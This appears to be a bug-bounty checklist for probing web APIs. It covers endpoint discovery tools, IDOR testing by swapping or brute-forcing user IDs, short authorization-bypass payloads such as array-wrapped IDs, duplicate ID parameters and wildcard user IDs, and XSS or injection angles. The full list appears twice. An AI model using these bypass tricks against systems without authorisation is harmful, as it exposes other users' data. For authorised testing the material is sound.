Uyavuz24/API Checklist

## API Checklist
* If worldist can't find anything on api, use hakrawler
* every domain could have an api. add jSON extension to endpoints and see response
* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
* Some endpoints will return you UUID as a response to e-mail adress etc...
* If there is no leak of User ID, just swap with user id of another account you created
* Look for permissions in every endpoint
* change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, Arjun it
* Use all HTTP Request methods
* Look for IDORs in HTTP headers and body
* Always try numeric IDs. Maybe you can accsess to non numerical ID place using numerical IDs. (e.g.: replace amail@google.com with "100")
* If api/v1/trips/666 returned 403, intrude it from 0 to 10000. The response may change
* Hunt for special event features
* Got 401/403 errors? AuthZ bypass tricks:
    Wrap ID with an array {“id”:111} --> {“id”:[111]}
    JSON wrap {“id”:111} --> {“id”:{“id”:111}}
    Send ID twice URL?id=<LEGIT>&id=<VICTIM>
    Send wildcard {"user_id":"*"}
* Also look for other endpoints or subdomains for bypassing auth
* There can be many endpoints handling auth
* If you're working on an old domain, the api maybe able to handle SOAP as well. So, chnage the content-type to "application/xml" and a simple XML in the request body
* Enumarate the api calls done by web app front end
* If there is an export to THAT file feature. Try HTML/CSS/JS injection
* APIs don't parse HTML but the front-end does. So, you may be able to bypass XSS protection by directly making request to API.
* If you know what's working on backend. Look for exploiting that framework/language features using internet.
	* If worldist can't find anything on api, use hakrawler
	* every domain could have an api. add jSON extension to endpoints and see response
	* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
	* Some endpoints will return you UUID as a response to e-mail adress etc...
	* If there is no leak of User ID, just swap with user id of another account you created
	* Look for permissions in every endpoint
	* change lowercase to uppercase or vice versa in endpoints
	* After finding endpoints, Arjun it
	* Use all HTTP Request methods
	* Look for IDORs in HTTP headers and body
	* Always try numeric IDs. Maybe you can accsess to non numerical ID place using numerical IDs. (e.g.: replace amail@google.com with "100")
	* If api/v1/trips/666 returned 403, intrude it from 0 to 10000. The response may change
	* Hunt for special event features
	* Got 401/403 errors? AuthZ bypass tricks:
	Wrap ID with an array {“id”:111} --> {“id”:[111]}
	JSON wrap {“id”:111} --> {“id”:{“id”:111}}
	Send ID twice URL?id=<LEGIT>&id=<VICTIM>
	Send wildcard {"user_id":"*"}
	* Also look for other endpoints or subdomains for bypassing auth
	* There can be many endpoints handling auth
	* If you're working on an old domain, the api maybe able to handle SOAP as well. So, chnage the content-type to "application/xml" and a simple XML in the request body
	* Enumarate the api calls done by web app front end
	* If there is an export to THAT file feature. Try HTML/CSS/JS injection
	* APIs don't parse HTML but the front-end does. So, you may be able to bypass XSS protection by directly making request to API.
	* If you know what's working on backend. Look for exploiting that framework/language features using internet.